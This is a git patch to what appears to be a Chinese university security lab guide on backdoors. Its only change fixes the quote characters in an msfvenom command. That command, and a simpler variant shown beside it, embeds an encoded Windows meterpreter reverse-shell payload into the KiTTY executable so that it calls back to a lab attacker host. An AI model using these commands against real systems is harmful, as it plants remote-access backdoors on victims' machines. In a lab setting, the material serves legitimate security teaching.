From 0e97ed84a60c4fac4916805a0e8ad00a795ed42f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=93=E6=96=B0=E7=94=B0?= <16290029+deng-xintian@user.noreply.gitee.com> Date: Mon, 6 Oct 2025 03:46:16 +0000 Subject: [PATCH] =?UTF-8?q?update=20ExpGuides/0x21=5FMAL=5F=E5=90=8E?= =?UTF-8?q?=E9=97=A8=E5=8E=9F=E7=90=86=E4=B8=8E=E5=AE=9E=E8=B7=B5.md.=20``?= =?UTF-8?q?`=20root@KaliYL:/home/YL#=20msfvenom=20-p=20windows/meterpreter?= =?UTF-8?q?/reverse=5Ftcp=20-x=20./KiTTYPortable.exe=20-e=20x86/shikata=5F?= =?UTF-8?q?ga=5Fnai=20-i=205=20-b=20=E2=80=98\x00=E2=80=99=20LHOST=3D192.1?= =?UTF-8?q?68.20.136=20LPORT=3D443=20-f=20exe=20>=20KiTTy=5Fbackdoor.exe?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 将 ‘\x00’的中文单引号修改为英文单引号'\x00' Signed-off-by: 邓新田 <16290029+deng-xintian@user.noreply.gitee.com> --- ...\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" "b/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" index ad46c1b..d3b68ce 100644 --- "a/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" +++ "b/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" @@ -340,7 +340,7 @@ windows版见[附件](http://git.oschina.net/wildlinux/NetSec/attach_files)。 下面指令中用到的 ./KiTTYPortable.exe 是一个普通的windows可执行文件,被我复制了/home/YL/目录下,后门会被写到这个文件中。我做实验时用的是KiTTYPortable.exe,你可以用其他文件代替。不论用哪个可执行文件都可以,但当然需要复制到linux下了。 ``` -root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe +root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe *** 或者简单点 *** root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 `PORT=443 -f exe > meter_backdoor.exe -- Gitee